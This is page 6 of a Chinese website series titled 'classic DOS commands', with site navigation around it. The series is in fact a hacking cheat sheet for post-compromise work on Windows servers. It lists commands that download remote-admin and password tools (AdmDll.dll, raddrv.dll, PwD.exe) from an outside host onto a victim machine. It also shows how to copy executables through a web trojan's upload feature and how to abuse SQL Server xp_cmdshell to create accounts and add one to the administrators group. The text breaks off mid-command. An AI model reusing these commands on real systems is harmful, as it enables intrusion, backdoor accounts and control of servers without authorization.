相关文章  
  • 面试必读:你是否经得起“折腾”
  • 选择方向比选择努力更重要
  • 综合辅导:Linux常用操作疑难解答(三)
  • 循序渐进学习Linux之特性综述
  • Linux桌面使用技巧集中(一)
  • Linux桌面使用技巧集中(二)
  • 系统管理:谈linux磁盘结构及分区
  • 系统管理:在linux下安装BT服务器
  • 嵌入式开发:手机中Linux操作系统扫盲
  • 安全管理中心(SOC)发展的三个维度
  •   推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    一些经典DOS命令6

    (23)使用软件下载 wt down http://192.168.45.219/tools/AdmDll.dll wt down http://192.168.45.219/tools/regsrc.exe wt down http://192.168.45.219/tools/raddrv.dll mt -netget http://192.168.45.219/tools/ntboot.dll ntboot.dll mt -netget http://192.168.45.219/tools/ntboot.exe ntboot.exe mt -netget http://192.168.45.219/tools/regsrc.exe regsrc.exe mt -netget http://192.168.45.219/tools/PwD.exe PwD.exe (24)在网站上复制文件 copy c:\tmp\*.exe c:\winnt\system32\inetsrv\data\ 使用网页木马的文件上传功能。 (25)使用SQL Server 2000的xp_cmdshell exec master.dbo.xp_cmdshell  ‘命令’ --执行命令 use master –使用哪一个数据 exec master.dbo.xp_cmdshell  'net user aspnet wshacker /add' exec master.dbo.xp_cmdshell  'net localgroup administrators asp2net /add'将脚本通过网页提交 exec xp_cmdshell 'echo spa=WshShell.Environment

    页码:[1] [2] [3] [4] [5] [6] [7] [8] [9]6页、共9页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved